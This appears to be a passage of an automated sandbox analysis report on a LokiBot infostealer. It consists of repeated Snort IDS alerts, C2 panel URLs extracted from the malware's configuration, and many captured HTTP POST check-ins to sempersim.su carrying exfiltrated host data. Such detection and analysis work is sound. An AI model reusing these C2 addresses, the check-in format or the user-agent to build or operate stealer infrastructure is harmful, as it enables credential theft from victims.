                  Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.6:49735 -> 91.142.77.45:80
                  Source: TrafficSnort IDS: 2825766 ETPRO TROJAN LokiBot Checkin M2 192.168.2.6:49735 -> 91.142.77.45:80
                  Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 91.142.77.45:80 -> 192.168.2.6:49735
                  Source: TrafficSnort IDS: 2014169 ET DNS Query for .su TLD (Soviet Union) Often Malware Related 192.168.2.6:60032 -> 8.8.8.8:53
                  Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.6:49736 -> 91.142.77.45:80
                  Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.6:49736 -> 91.142.77.45:80
                  Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.6:49736 -> 91.142.77.45:80
                  Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.6:49736 -> 91.142.77.45:80
                  Source: TrafficSnort IDS: 2825766 ETPRO TROJAN LokiBot Checkin M2 192.168.2.6:49736 -> 91.142.77.45:80
                  Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 91.142.77.45:80 -> 192.168.2.6:49736
                  Source: TrafficSnort IDS: 2014169 ET DNS Query for .su TLD (Soviet Union) Often Malware Related 192.168.2.6:49232 -> 8.8.8.8:53
                  Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.6:49737 -> 91.142.77.45:80
                  Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.6:49737 -> 91.142.77.45:80
                  Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.6:49737 -> 91.142.77.45:80
                  Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.6:49737 -> 91.142.77.45:80
                  Source: TrafficSnort IDS: 2825766 ETPRO TROJAN LokiBot Checkin M2 192.168.2.6:49737 -> 91.142.77.45:80
                  Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 91.142.77.45:80 -> 192.168.2.6:49737
                  Source: TrafficSnort IDS: 2014169 ET DNS Query for .su TLD (Soviet Union) Often Malware Related 192.168.2.6:56123 -> 8.8.8.8:53
                  Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.6:49738 -> 91.142.77.45:80
                  Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.6:49738 -> 91.142.77.45:80
                  Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.6:49738 -> 91.142.77.45:80
                  Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.6:49738 -> 91.142.77.45:80
                  Source: TrafficSnort IDS: 2825766 ETPRO TROJAN LokiBot Checkin M2 192.168.2.6:49738 -> 91.142.77.45:80
                  Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 91.142.77.45:80 -> 192.168.2.6:49738
                  Source: TrafficSnort IDS: 2014169 ET DNS Query for .su TLD (Soviet Union) Often Malware Related 192.168.2.6:59752 -> 8.8.8.8:53
                  Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.6:49739 -> 91.142.77.45:80
                  Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.6:49739 -> 91.142.77.45:80
                  Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.6:49739 -> 91.142.77.45:80
                  Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.6:49739 -> 91.142.77.45:80
                  Source: TrafficSnort IDS: 2825766 ETPRO TROJAN LokiBot Checkin M2 192.168.2.6:49739 -> 91.142.77.45:80
                  Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 91.142.77.45:80 -> 192.168.2.6:49739
                  Source: TrafficSnort IDS: 2014169 ET DNS Query for .su TLD (Soviet Union) Often Malware Related 192.168.2.6:52865 -> 8.8.8.8:53
                  Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.6:49740 -> 91.142.77.45:80
                  Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.6:49740 -> 91.142.77.45:80
                  Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.6:49740 -> 91.142.77.45:80
                  Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.6:49740 -> 91.142.77.45:80
                  Source: TrafficSnort IDS: 2825766 ETPRO TROJAN LokiBot Checkin M2 192.168.2.6:49740 -> 91.142.77.45:80
                  Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 91.142.77.45:80 -> 192.168.2.6:49740
                  Source: TrafficSnort IDS: 2014169 ET DNS Query for .su TLD (Soviet Union) Often Malware Related 192.168.2.6:57322 -> 8.8.8.8:53
                  Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.6:49741 -> 91.142.77.45:80
                  Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.6:49741 -> 91.142.77.45:80
                  Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.6:49741 -> 91.142.77.45:80
                  Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.6:49741 -> 91.142.77.45:80
                  Source: TrafficSnort IDS: 2825766 ETPRO TROJAN LokiBot Checkin M2 192.168.2.6:49741 -> 91.142.77.45:80
                  Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 91.142.77.45:80 -> 192.168.2.6:49741
                  Source: TrafficSnort IDS: 2014169 ET DNS Query for .su TLD (Soviet Union) Often Malware Related 192.168.2.6:62958 -> 8.8.8.8:53
                  Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.6:49742 -> 91.142.77.45:80
                  Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.6:49742 -> 91.142.77.45:80
                  Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.6:49742 -> 91.142.77.45:80
                  Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.6:49742 -> 91.142.77.45:80
                  Source: TrafficSnort IDS: 2825766 ETPRO TROJAN LokiBot Checkin M2 192.168.2.6:49742 -> 91.142.77.45:80
                  Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 91.142.77.45:80 -> 192.168.2.6:49742
                  Source: TrafficSnort IDS: 2014169 ET DNS Query for .su TLD (Soviet Union) Often Malware Related 192.168.2.6:64404 -> 8.8.8.8:53
                  Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.6:49743 -> 91.142.77.45:80
                  Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.6:49743 -> 91.142.77.45:80
                  Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.6:49743 -> 91.142.77.45:80
                  Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.6:49743 -> 91.142.77.45:80
                  Source: TrafficSnort IDS: 2825766 ETPRO TROJAN LokiBot Checkin M2 192.168.2.6:49743 -> 91.142.77.45:80
                  Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 91.142.77.45:80 -> 192.168.2.6:49743
                  Source: TrafficSnort IDS: 2014169 ET DNS Query for .su TLD (Soviet Union) Often Malware Related 192.168.2.6:62848 -> 8.8.8.8:53
                  Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.6:49744 -> 91.142.77.45:80
                  Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.6:49744 -> 91.142.77.45:80
                  Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.6:49744 -> 91.142.77.45:80
                  Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.6:49744 -> 91.142.77.45:80
                  Source: TrafficSnort IDS: 2825766 ETPRO TROJAN LokiBot Checkin M2 192.168.2.6:49744 -> 91.142.77.45:80
                  Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 91.142.77.45:80 -> 192.168.2.6:49744
                  Source: TrafficSnort IDS: 2014169 ET DNS Query for .su TLD (Soviet Union) Often Malware Related 192.168.2.6:55956 -> 8.8.8.8:53
                  Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.6:49745 -> 91.142.77.45:80
                  Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.6:49745 -> 91.142.77.45:80
                  Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.6:49745 -> 91.142.77.45:80
                  Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.6:49745 -> 91.142.77.45:80
                  Source: TrafficSnort IDS: 2825766 ETPRO TROJAN LokiBot Checkin M2 192.168.2.6:49745 -> 91.142.77.45:80
                  Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 91.142.77.45:80 -> 192.168.2.6:49745
                  Source: Malware configuration extractorURLs: http://kbfvzoboss.bid/alien/fre.php
                  Source: Malware configuration extractorURLs: http://alphastand.trade/alien/fre.php
                  Source: Malware configuration extractorURLs: http://alphastand.win/alien/fre.php
                  Source: Malware configuration extractorURLs: http://alphastand.top/alien/fre.php
                  Source: Malware configuration extractorURLs: http://sempersim.su/gl21/fre.php
                  Source: Joe Sandbox ViewASN Name: VTSL1-ASRU VTSL1-ASRU
                  Source: Joe Sandbox ViewIP Address: 91.142.77.45 91.142.77.45
                  Source: global trafficHTTP traffic detected: POST /gl21/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: sempersim.suAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 79F54F54Content-Length: 196Connection: close
                  Source: global trafficHTTP traffic detected: POST /gl21/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: sempersim.suAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 79F54F54Content-Length: 196Connection: close
                  Source: global trafficHTTP traffic detected: POST /gl21/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: sempersim.suAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 79F54F54Content-Length: 169Connection: close
                  Source: global trafficHTTP traffic detected: POST /gl21/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: sempersim.suAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 79F54F54Content-Length: 169Connection: close
                  Source: global trafficHTTP traffic detected: POST /gl21/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: sempersim.suAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 79F54F54Content-Length: 169Connection: close
                  Source: global trafficHTTP traffic detected: POST /gl21/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: sempersim.suAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 79F54F54Content-Length: 169Connection: close
                  Source: global trafficHTTP traffic detected: POST /gl21/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: sempersim.suAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 79F54F54Content-Length: 169Connection: close
                  Source: global trafficHTTP traffic detected: POST /gl21/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: sempersim.suAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 79F54F54Content-Length: 169Connection: close
                  Source: global trafficHTTP traffic detected: POST /gl21/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: sempersim.suAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 79F54F54Content-Length: 169Connection: close
                  Source: global trafficHTTP traffic detected: POST /gl21/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: sempersim.suAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 79F54F54Content-Length: 169Connection: close
                  Source: global trafficHTTP traffic detected: POST /gl21/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: sempersim.suAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 79F54F54Content-Length: 169Connection: close
                  Source: global trafficHTTP traffic detected: POST /gl21/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: sempersim.suAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 79F54F54Content-Length: 169Connection: close
                  Source: global trafficHTTP traffic detected: POST /gl21/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: sempersim.suAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 79F54F54Content-Length: 169Connection: close
                  Source: global trafficHTTP traffic detected: POST /gl21/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: sempersim.suAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 79F54F54Content-Length: 169Connection: close
                  Source: global trafficHTTP traffic detected: POST /gl21/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: sempersim.suAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 79F54F54Content-Length: 169Connection: closeData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 10 00 00 00 65 00 6e 00 67 00 69 00 6e 00 65 00 65 00 72 00 01 00 0c 00 00 00 34 00 30 00 35 00 34 00 36 00 34 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37 00 37 00 31 00 00 05 00 00 00 04 00 00 01 00 01 00 01 00 0a 00 00 00 01 00 00 00 01 00 30 00 00 00 38 00 46 00 39 00 43 00 34 00 45 00 39 00 43 00 37 00 39 00 41 00 33 00 42 00 35 00 32 00 42 00 33 00 46 00 37 00 33 00 39 00 34 00 33 00 30 00 Data Ascii: (ckav.ruengineer405464DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                  Source: global trafficHTTP traffic detected: POST /gl21/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: sempersim.suAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 79F54F54Content-Length: 169Connection: closeData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 10 00 00 00 65 00 6e 00 67 00 69 00 6e 00 65 00 65 00 72 00 01 00 0c 00 00 00 34 00 30 00 35 00 34 00 36 00 34 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37 00 37 00 31 00 00 05 00 00 00 04 00 00 01 00 01 00 01 00 0a 00 00 00 01 00 00 00 01 00 30 00 00 00 38 00 46 00 39 00 43 00 34 00 45 00 39 00 43 00 37 00 39 00 41 00 33 00 42 00 35 00 32 00 42 00 33 00 46 00 37 00 33 00 39 00 34 00 33 00 30 00 Data Ascii: (ckav.ruengineer405464DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                  Source: global trafficHTTP traffic detected: POST /gl21/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: sempersim.suAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 79F54F54Content-Length: 169Connection: close
                  Source: global trafficHTTP traffic detected: POST /gl21/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: sempersim.suAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 79F54F54Content-Length: 169Connection: close
                  Source: global trafficHTTP traffic detected: POST /gl21/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: sempersim.suAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 79F54F54Content-Length: 169Connection: closeData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 10 00 00 00 65 00 6e 00 67 00 69 00 6e 00 65 00 65 00 72 00 01 00 0c 00 00 00 34 00 30 00 35 00 34 00 36 00 34 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37 00 37 00 31 00 00 05 00 00 00 04 00 00 01 00 01 00 01 00 0a 00 00 00 01 00 00 00 01 00 30 00 00 00 38 00 46 00 39 00 43 00 34 00 45 00 39 00 43 00 37 00 39 00 41 00 33 00 42 00 35 00 32 00 42 00 33 00 46 00 37 00 33 00 39 00 34 00 33 00 30 00 Data Ascii: (ckav.ruengineer405464DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                  Source: global trafficHTTP traffic detected: POST /gl21/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: sempersim.suAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 79F54F54Content-Length: 169Connection: close
                  Source: global trafficHTTP traffic detected: POST /gl21/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: sempersim.suAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 79F54F54Content-Length: 169Connection: closeData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 10 00 00 00 65 00 6e 00 67 00 69 00 6e 00 65 00 65 00 72 00 01 00 0c 00 00 00 34 00 30 00 35 00 34 00 36 00 34 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37 00 37 00 31 00 00 05 00 00 00 04 00 00 01 00 01 00 01 00 0a 00 00 00 01 00 00 00 01 00 30 00 00 00 38 00 46 00 39 00 43 00 34 00 45 00 39 00 43 00 37 00 39 00 41 00 33 00 42 00 35 00 32 00 42 00 33 00 46 00 37 00 33 00 39 00 34 00 33 00 30 00 Data Ascii: (ckav.ruengineer405464DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                  Source: global trafficHTTP traffic detected: POST /gl21/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: sempersim.suAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 79F54F54Content-Length: 169Connection: close
                  Source: global trafficHTTP traffic detected: POST /gl21/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: sempersim.suAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 79F54F54Content-Length: 169Connection: close
                  Source: global trafficHTTP traffic detected: POST /gl21/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: sempersim.suAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 79F54F54Content-Length: 169Connection: closeData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 10 00 00 00 65 00 6e 00 67 00 69 00 6e 00 65 00 65 00 72 00 01 00 0c 00 00 00 34 00 30 00 35 00 34 00 36 00 34 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37 00 37 00 31 00 00 05 00 00 00 04 00 00 01 00 01 00 01 00 0a 00 00 00 01 00 00 00 01 00 30 00 00 00 38 00 46 00 39 00 43 00 34 00 45 00 39 00 43 00 37 00 39 00 41 00 33 00 42 00 35 00 32 00 42 00 33 00 46 00 37 00 33 00 39 00 34 00 33 00 30 00 Data Ascii: (ckav.ruengineer405464DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                  Source: global trafficHTTP traffic detected: POST /gl21/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: sempersim.suAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 79F54F54Content-Length: 169Connection: closeData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 10 00 00 00 65 00 6e 00 67 00 69 00 6e 00 65 00 65 00 72 00 01 00 0c 00 00 00 34 00 30 00 35 00 34 00 36 00 34 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37 00 37 00 31 00 00 05 00 00 00 04 00 00 01 00 01 00 01 00 0a 00 00 00 01 00 00 00 01 00 30 00 00 00 38 00 46 00 39 00 43 00 34 00 45 00 39 00 43 00 37 00 39 00 41 00 33 00 42 00 35 00 32 00 42 00 33 00 46 00 37 00 33 00 39 00 34 00 33 00 30 00 Data Ascii: (ckav.ruengineer405464DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                  Source: global trafficHTTP traffic detected: POST /gl21/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: sempersim.suAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 79F54F54Content-Length: 169Connection: close
                  Source: global trafficHTTP traffic detected: POST /gl21/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: sempersim.suAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 79F54F54Content-Length: 169Connection: close
                  Source: global trafficHTTP traffic detected: POST /gl21/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: sempersim.suAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 79F54F54Content-Length: 169Connection: close
                  Source: global trafficHTTP traffic detected: POST /gl21/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: sempersim.suAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 79F54F54Content-Length: 169Connection: close
                  Source: global trafficHTTP traffic detected: POST /gl21/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: sempersim.suAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 79F54F54Content-Length: 169Connection: close
                  Source: global trafficHTTP traffic detected: POST /gl21/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: sempersim.suAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 79F54F54Content-Length: 169Connection: close
                  Source: global trafficHTTP traffic detected: POST /gl21/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: sempersim.suAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 79F54F54Content-Length: 169Connection: close
                  Source: global trafficHTTP traffic detected: POST /gl21/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: sempersim.suAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 79F54F54Content-Length: 169Connection: close
                  Source: global trafficHTTP traffic detected: POST /gl21/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: sempersim.suAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 79F54F54Content-Length: 169Connection: close
                  Source: global trafficHTTP traffic detected: POST /gl21/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: sempersim.suAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 79F54F54Content-Length: 169Connection: closeData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 10 00 00 00 65 00 6e 00 67 00 69 00 6e 00 65 00 65 00 72 00 01 00 0c 00 00 00 34 00 30 00 35 00 34 00 36 00 34 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37 00 37 00 31 00 00 05 00 00 00 04 00 00 01 00 01 00 01 00 0a 00 00 00 01 00 00 00 01 00 30 00 00 00 38 00 46 00 39 00 43 00 34 00 45 00 39 00 43 00 37 00 39 00 41 00 33 00 42 00 35 00 32 00 42 00 33 00 46 00 37 00 33 00 39 00 34 00 33 00 30 00 Data Ascii: (ckav.ruengineer405464DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                  Source: global trafficHTTP traffic detected: POST /gl21/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: sempersim.suAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 79F54F54Content-Length: 169Connection: close
                  Source: global trafficHTTP traffic detected: POST /gl21/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: sempersim.suAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 79F54F54Content-Length: 169Connection: close
                  Source: global trafficHTTP traffic detected: POST /gl21/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: sempersim.suAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 79F54F54Content-Length: 169Connection: close
                  Source: global trafficHTTP traffic detected: POST /gl21/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: sempersim.suAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 79F54F54Content-Length: 169Connection: close
                  Source: global trafficHTTP traffic detected: POST /gl21/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: sempersim.suAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 79F54F54Content-Length: 169Connection: close
                  Source: global trafficHTTP traffic detected: POST /gl21/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: sempersim.suAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 79F54F54Content-Length: 169Connection: closeData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 10 00 00 00 65 00 6e 00 67 00 69 00 6e 00 65 00 65 00 72 00 01 00 0c 00 00 00 34 00 30 00 35 00 34 00 36 00 34 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37 00 37 00 31 00 00 05 00 00 00 04 00 00 01 00 01 00 01 00 0a 00 00 00 01 00 00 00 01 00 30 00 00 00 38 00 46 00 39 00 43 00 34 00 45 00 39 00 43 00 37 00 39 00 41 00 33 00 42 00 35 00 32 00 42 00 33 00 46 00 37 00 33 00 39 00 34 00 33 00 30 00 Data Ascii: (ckav.ruengineer405464DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                  Source: global trafficHTTP traffic detected: POST /gl21/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: sempersim.suAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 79F54F54Content-Length: 169Connection: close
                  Source: global trafficHTTP traffic detected: POST /gl21/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: sempersim.suAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 79F54F54Content-Length: 169Connection: close
                  Source: global trafficHTTP traffic detected: POST /gl21/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: sempersim.suAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 79F54F54Content-Length: 169Connection: closeData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 10 00 00 00 65 00 6e 00 67 00 69 00 6e 00 65 00 65 00 72 00 01 00 0c 00 00 00 34 00 30 00 35 00 34 00 36 00 34 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37 00 37 00 31 00 00 05 00 00 00 04 00 00 01 00 01 00 01 00 0a 00 00 00 01 00 00 00 01 00 30 00 00 00 38 00 46 00 39 00 43 00 34 00 45 00 39 00 43 00 37 00 39 00 41 00 33 00 42 00 35 00 32 00 42 00 33 00 46 00 37 00 33 00 39 00 34 00 33 00 30 00 Data Ascii: (ckav.ruengineer405464DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                  Source: global trafficHTTP traffic detected: POST /gl21/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: sempersim.suAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 79F54F54Content-Length: 169Connection: close
                  Source: global trafficHTTP traffic detected: POST /gl21/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: sempersim.suAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 79F54F54Content-Length: 169Connection: close
